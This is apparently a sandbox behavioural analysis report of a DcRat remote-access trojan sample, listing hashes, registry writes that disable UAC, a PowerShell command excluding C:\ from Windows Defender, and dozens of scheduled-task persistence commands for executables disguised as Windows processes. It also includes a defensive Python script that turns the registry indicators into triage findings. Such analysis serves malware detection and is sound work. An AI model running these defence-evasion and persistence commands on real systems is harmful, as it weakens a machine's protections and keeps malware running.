Analysis
max time kernel: 120s
max time network: 120s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 14-05-2024 05:56
Behavioral task: behavioral1
Sample: 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Resource: win7-20240508-en
Behavioral task: behavioral2
Sample: 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Resource: win10v2004-20240508-en
General
Target: 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Size: 2.7MB
MD5: 8cdae0ef9f7f5ab79ec5671644e1a0f0
SHA1: dfae9279327bb5658e9d95daae768bfaf4dca42f
SHA256: e4c8b1c4527c76289bb4247f0a02d3dd85545bdc59530f005941455d05826aed
SHA512: 828146a24cc9ddac7e6e4f80df37356cbaf1bf93be1540b9cc3c5e49c7a46ef49f74ef48ba23998b5c388575aa792cc3f43043aadb15ff5b21eff841f49171f6
SSDEEP: 49152:yH64y2XDuLlIY14o9/yDzr1xJ8XbRrC9mWvR08Yv7yP3GcY:yHfE5Ad8Xd295UmGc
Malware Config
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.
Modifies WinLogon for persistence (2 TTPs, 18 IoCs)
Process spawned unexpected child process (54 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: services.exe, 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" (services.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" (8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (services.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (services.exe)
Processes:
resource: behavioral1/memory/2392-1-0x0000000000190000-0x0000000000450000-memory.dmp, yara_rule: dcrat
resource: C:\Users\Default\Favorites\services.exe, yara_rule: dcrat
resource: C:\Program Files (x86)\Windows Defender\fr-FR\RCX27F2.tmp, yara_rule: dcrat
resource: behavioral1/memory/900-196-0x0000000000090000-0x0000000000350000-memory.dmp, yara_rule: dcrat
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Executes dropped EXE (1 IoCs)
Processes:
pid 900: services.exe
Adds Run key to start application (2 TTPs, 34 IoCs)
Processes: 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe, services.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe)
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (services.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (services.exe)
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe)
Drops file in Program Files directory 12 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
description ioc process
File created C:\Program Files (x86)\Windows Defender\fr-FR\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File created C:\Program Files (x86)\Windows Defender\fr-FR\c5b4cb5e9653cc 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File created C:\Program Files (x86)\Windows Defender\en-US\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\RCX25EE.tmp 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File opened for modification C:\Program Files (x86)\Windows Defender\en-US\RCX3FDF.tmp 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\6cb0b6c459d5d3 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File created C:\Program Files (x86)\Windows Defender\en-US\c5b4cb5e9653cc 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\RCX27F2.tmp 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File opened for modification C:\Program Files (x86)\Windows Defender\en-US\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 54 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe (54 instances)
pid process: 2480, 316, 1472, 2032, 1924, 1864, 1512, 2800, 3032, 3048, 616, 2680, 624, 1784, 444, 2908, 2756, 2220, 2772, 2372, 2108, 2996, 3008, 1992, 2308, 2508, 2440, 2000, 236, 2520, 940, 2380, 2320, 660, 1740, 1640, 1696, 1844, 1716, 1552, 2352, 888, 1624, 2796, 1060, 944, 1848, 2052, 2960, 2284, 2896, 2840, 348, 832 (each one schtasks.exe)
-
Modifies system certificate store 2 IoCs
Processes:
services.exe
description ioc process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 services.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 services.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe services.exe
pid process
2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe (49 entries)
2472 powershell.exe (1 entry)
900 services.exe (14 entries)
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe services.exe
description pid process
Token: SeDebugPrivilege 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Token: SeDebugPrivilege 2472 powershell.exe
Token: SeDebugPrivilege 900 services.exe
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe cmd.exe
description pid process target process
PID 2392 wrote to memory of 2472 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe
PID 2392 wrote to memory of 2472 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe
PID 2392 wrote to memory of 2472 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe
PID 2392 wrote to memory of 2200 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe cmd.exe
PID 2392 wrote to memory of 2200 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe cmd.exe
PID 2392 wrote to memory of 2200 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe cmd.exe
PID 2200 wrote to memory of 2204 2200 cmd.exe w32tm.exe
PID 2200 wrote to memory of 2204 2200 cmd.exe w32tm.exe
PID 2200 wrote to memory of 2204 2200 cmd.exe w32tm.exe
PID 2200 wrote to memory of 900 2200 cmd.exe services.exe
PID 2200 wrote to memory of 900 2200 cmd.exe services.exe
PID 2200 wrote to memory of 900 2200 cmd.exe services.exe
-
System policy modification 1 TTPs 6 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe services.exe
description ioc process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" services.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" services.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" services.exe
-
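The registry IoCs in the signatures above (Run-key values pointing at copies of the sample named after core Windows processes, the EnableLUA / ConsentPromptBehaviorAdmin / PromptOnSecureDesktop writes, and the root-store key created by the dropped services.exe) all share one report line format, so they can be turned into triage findings mechanically. ConsentPromptBehaviorAdmin=0 makes administrator elevation requests succeed silently and EnableLUA=0 switches UAC off entirely at the next reboot, which is why the sample writes them before its copies run. The Python below is an added example, not code from the sandbox or from the sample: the SYSTEM_NAMES list, the "outside C:\Windows" test and the finding names are assumptions made here, the IoC lines are copied from this report, and the Winlogon\Shell line is constructed (shortened to one appended entry). The report does not say which certificate the Blob contains, so dump the value and compare its thumbprint against the roots you expect before treating the key as a planted CA.

```python
import re
from dataclasses import dataclass

# Core-process names the sample reuses for its copies (assumed list); the real ones live under C:\Windows.
SYSTEM_NAMES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "services.exe",
                "lsm.exe", "dwm.exe", "spoolsv.exe", "explorer.exe", "lsass.exe"}
# Policies\System values that, when set to 0, disable UAC or its prompts.
UAC_POLICY = {"EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop"}

# Line shapes used by the report: 'Set value (<type>) <key>\<name> = "<data>" <process>'
# and 'Key created <key> <process>'. Other operations ("Key value queried", ...) are ignored.
SET_RE = re.compile(r'^Set value \((\w+)\) (.+?) = "(.*)" (\S+)$')
KEY_RE = re.compile(r'^Key created (.+) (\S+)$')


@dataclass
class Finding:
    kind: str
    detail: str
    process: str


def _unescape(data: str) -> str:
    # REG_SZ data is printed JSON-style (\" for a quote, \\ for a backslash); undo that.
    return data.replace('\\"', '"').replace('\\\\', '\\')


def _outside_windows(path: str) -> bool:
    return not path.lower().startswith("c:\\windows\\")


def triage_registry_line(line: str) -> list:
    """Return the Findings one report line earns; an empty list means nothing notable."""
    m = SET_RE.match(line)
    if m:
        _vtype, full_path, raw, proc = m.groups()
        key, _, name = full_path.rpartition("\\")
        data = _unescape(raw)
        low = key.lower()
        if low.endswith("\\policies\\system") and name in UAC_POLICY and data == "0":
            return [Finding("uac_weakened", f"{name}=0", proc)]
        if low.endswith("\\currentversion\\run"):
            exe = data.strip('"')
            if exe.rsplit("\\", 1)[-1].lower() in SYSTEM_NAMES and _outside_windows(exe):
                return [Finding("masquerading_autorun", f"Run\\{name} -> {exe}", proc)]
        if low.endswith("\\winlogon") and name == "Shell":
            # A clean Shell value is exactly "explorer.exe"; anything appended runs at every logon.
            entries = [e.strip().strip('"') for e in data.split(",")]
            extra = [e for e in entries if e.lower() != "explorer.exe"]
            if extra:
                return [Finding("winlogon_shell_hijack", "; ".join(extra), proc)]
        return []
    m = KEY_RE.match(line)
    if m:
        path, proc = m.groups()
        parent, _, leaf = path.rpartition("\\")
        if parent.lower().endswith("\\systemcertificates\\root\\certificates"):
            return [Finding("root_ca_added", f"thumbprint {leaf}", proc)]
    return []


def triage_report(lines: list) -> list:
    return [f for line in lines for f in triage_registry_line(line)]


def summarize(findings: list) -> dict:
    """Count findings per kind."""
    counts = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


# IoC lines copied from the report; the Winlogon\Shell line is constructed and shortened to one appended entry.
SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Defender\\en-US\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\Downloads\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe',
    r'Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" services.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 services.exe',
]

if __name__ == "__main__":
    for f in triage_report(SAMPLE_LINES):
        print(f"{f.kind:24} {f.process:52} {f.detail}")
```

The masquerade test is deliberately narrow: a Run value is flagged only when its target carries a core-process name and lives outside C:\Windows, which is exactly the combination a legitimate autorun never has. The "Key value queried" lines are dropped on purpose; keep them if you want to see the sample probing EnableLUA before it decides whether to bypass UAC.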
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1gqmGK9flh.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:2204
-
-
C:\Program Files (x86)\Windows Defender\en-US\services.exe"C:\Program Files (x86)\Windows Defender\en-US\services.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:900
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Downloads\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Downloads\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2508
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2908
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Favorites\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default\Favorites\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Favorites\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Public\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1640
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Public\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\NetHood\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\NetHood\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2960
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1848
-
